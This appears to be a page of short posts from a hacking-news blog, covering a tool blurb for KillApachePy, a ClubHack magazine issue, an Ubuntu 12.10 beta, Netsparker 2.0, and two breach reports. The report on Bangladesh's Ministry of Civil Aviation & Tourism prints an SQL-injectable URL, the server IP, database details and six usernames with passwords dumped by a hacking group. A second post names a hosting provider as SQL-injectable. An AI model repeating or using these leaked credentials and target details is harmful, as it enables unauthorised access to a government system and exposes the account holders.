KillApachePy aims to be more user-friendly and has a few workflow enhancements, such as automatic use of the maximum number of threads the system allows, a custom HTTP method (GET/HEAD/...), a custom target page, proxy support, etc. As always with his code, it is small, efficient and highly optimized.

For More Information & to Download The Source Code Click Here



CLUB HACK Magazine has been released


March witnessed the launch of the much awaited Mozilla Firefox 4. We dedicate this issue to Mozilla and even the cover page that I designed (ahem) reflects that. The month started on a high note with India finally winning the ICC World Cup that also awakened our patriotic feelings.
Keeping with the theme of browser security, this issue covers Mozilla Security in Tech Gyan, FireCAT in Tool Gyan, Being Invisible on the Internet in Moms Guide, Configuring Apache SSL in Command Line, Introduction to newly launched Matriux Vibhag and New Rules of Information Technology in Legal Gyan.
We at ClubHack Mag would like to thank our contributors for an overwhelming response to the call for articles for this issue. Browser security affects all users of the Internet and therefore, we have decided that to keep the same theme for our May issue.
Wireless networking is another issue that is now looming large on the horizon of most organisations and has even penetrated most tech-savvy homes. We intend to cover Wireless penetration testing for our subsequent issues. Keep sending your articles to info@chmag.in
Happy and Safe surfing!
In April issue we have the following articles

0x00 Tech Gyan - Mozilla Firefox Internals & Attack Strategies
0x01 Tool Gyan - FireCAT
0x02 Mom's Guide - Being Invisible on the Internet
0x03 Legal Gyan - The Information Technology Rules, 2011
0x04 Command Line Gyan - Configuring Apache SSL
0x05 Matriux Vibhag - Introduction Part 2
0x06 Poster of the month - Happy and Safe Surfing.
In India we were waiting to see any 'hacking' magazine happen and the wait was getting a little longer. So finally ClubHack decided to come up with its own, the 1st Indian "Hacking" Magazine, called CHmag.
We at ClubHack are more than thrilled about the magazine and this fits into our main objective of making hacking and information security common sense for the common man.
Moving further we need a lot of help from the whole information security community of the country to make this a success.
This magazine is divided into the following sections:
0x00 Tech Gyan of the month
0x01 Legal Gyan of the month
0x02 Tool Gyan of the month
0x03 Command Line Gyan of the month
0x04 Mom's Guide of the month
0x05 Awareness Poster of the month
We hope to add a lot of sections in future, all we need is input from you as to what you would like to see in your magazine
The PDF version can be downloaded from http://chmag.in/issue/apr2011.pdf


Ubuntu 12.10 Codenamed "Quantal Quetzal" Beta 1 Released !!

After two alpha releases (Alpha 1 and Alpha 2) it is now time for a beta: as expected, Canonical and the Ubuntu developer team have released the first beta of version 12.10 of their Ubuntu Desktop, Server, Cloud and Core products, code-named "Quantal Quetzal". Ubuntu 12.10 Beta 1 ships a kernel based on Linux 3.5.3, the current stable release of the 3.5 series.
12.10 continues Ubuntu's proud tradition of integrating the latest and greatest open source technologies into a high-quality, easy-to-use Linux distribution.  The team has been hard at work through this cycle, introducing new features and fixing bugs. For the client, this release now has a consolidated Ubuntu image.  There is no longer a traditional CD sized image, DVD or alternate image, but rather a single 800MB Ubuntu image that can be used from USB or DVD.  This change does not affect Ubuntu Server, which remains a traditional CD sized image.  With Ubuntu 12.10, Kubuntu, Edubuntu, Lubuntu, and Ubuntu Studio also reached Beta 1 status today.   These images, along with Xubuntu will continue to have daily updates for the remainder of the release. The final version of Ubuntu 12.10 is expected to be released on October 18, 2012

Key Features at a Glance:- 

  • The consolidated client images now support the logical volume manager (LVM) as well as full disk encryption.
  • Update Manager has been renamed Software Updater and now checks for updates when launched.
  • A new X.org stack has been introduced which includes xserver 1.13 candidate versions, mesa 9.0, and updated X libs and drivers. 
  • Unity has been updated to version 6.4 including support for dash previews and coverflow view.  Now that compiz with GLES support has  landed, unity-3d works again on the pandaboard.
  • The Ubuntu desktop has begun migrating from Python 2 to Python 3. Most Python applications included in the desktop are now using Python 3, and most Python modules that are included by default are available for both Python 2 and Python 3.



Changes in Ubuntu Server and Cloud Images:-

  • ARM hard float (armhf) cloud images are now available.
  • OpenStack Folsom testing packages are available. OpenStack instance architecture testing support has been added, as has a heterogeneous scheduler for ARM.
  • Apache Tomcat 7 is now the default supported version. Ceph has updated to 0.48.1 (upstream argonaut stable release), and includes RADOS Gateway (S3 and Swift Compatible), as well as performance improvements.
  • Floodlight (Openflow Network Controller) and mininet (Network Simulation) packages are now available.
According to the project's release schedule, the beta release will be followed by a second beta on 27 September. The current stable release is Ubuntu 12.04.1 LTS, the first point update to the Long Term Support (LTS) edition of the distribution.


To Download Ubuntu 12.10 Beta 1 (Both Ubuntu Desktop and Ubuntu Server) Click Here









Ministry of Civil Aviation & Tourism, Bangladesh Hacked By TEAM T!g3R

The Ministry of Civil Aviation & Tourism, Bangladesh is vulnerable to SQL injection, and its entire database has been dumped by TEAM T!g3R. They exposed sensitive information such as the DB name, server details, admin credentials and more.

Vulnerable Site:-
http://www.mocat.gov.bd/

Vulnerable Link:-

Server Details:-

Target:         http://www.mocat.gov.bd/personnel.php?id=1
Host IP:        75.125.91.162
Web Server:  Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5        mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
                        mod_perl/2.0.5 Perl/v5.8.8

Powered-by:         PHP/5.2.17
DB Server:          MySQL >=5
Resp. Time(avg):    4767 ms
Current User:       mocatgo_mocatdb@localhost
Sql Version:        5.1.56-log
Current DB:         mocatgo_mocatdb
System User:        mocatgo_mocatdb@localhost
Host Name:         dhaka-bd2.number1shop.com
Installation dir:         /
DB User:         ' mocatgo_mocatdb'@'localhost'


User Credentials:-
admin          QQmoca3tad
jabed           QQrrtre
rubel           QQinfo@bdt
rumu           QQinfo
sdnp            QQqrr
tina             QQadmin


To see the hacked DB click Here

Here are some screenshots submitted by the hacker:-


Web Hosting, Reseller, VPS & Dedicated Services Provider Hosterbox Is Vulnerable to SQL-i, Says Shadman Tanjim (BCA)



Web hosting, reseller, VPS & dedicated services provider Hosterbox hacked by Shadman Tanjim, admin of Bangladesh Cyber Army

According to the Hacker:- 

Website: www.hosterbox.com
Hacking Method: SQL Injection
Vulnerability risk: high
Host IP: 184.82.153.150
Web Server: Apache
Powered-by: PHP/5.2.16
Injected Link:



Netsparker 2.0 Released (Web Application Security Scanner)

Mavituna Security has released V2.0 of its web application security scanner Netsparker. The new version includes 16 new security checks, 15 new features and a variety of minor improvements.
New in V2.0 is a Vulnerability Database with a list of known vulnerabilities for Apache, Tomcat, MSSQL and MySQL. When Netsparker identifies one of these systems, it’ll reference the database and report all known vulnerabilities for that particular version with severity, exploit details and CVE references.

The new security checks performed by Netsparker 2.0 include: SSL checks (Netsparker reports weak ciphers, self-signed certificates and similar SSL/certificate issues), Tomcat default file checks, ASP.NET MVC version disclosure checks and Mongrel / Nginx version disclosure checks.

The vulnerability engine has also been enhanced:

    * Improved Signature based SQL Injection detection
    * LFI checks improved and coverage increased
    * Attribute-based XSS checks improved
    * PHP source code disclosure checks improved
    * Protocol-based XSS attacks significantly improved
    * ASP.NET / .NET Framework 4 Viewstate support added. MAC Enabled and Encryption issues will also be reported correctly in .NET Framework 4 systems
    * ORACLE SQL Injection checks improved

On a lighter note, Mavituna Security are also proud of the new dramatic splash screen. You can’t beat that!

For more Information About Netsparker 2.0 click Here
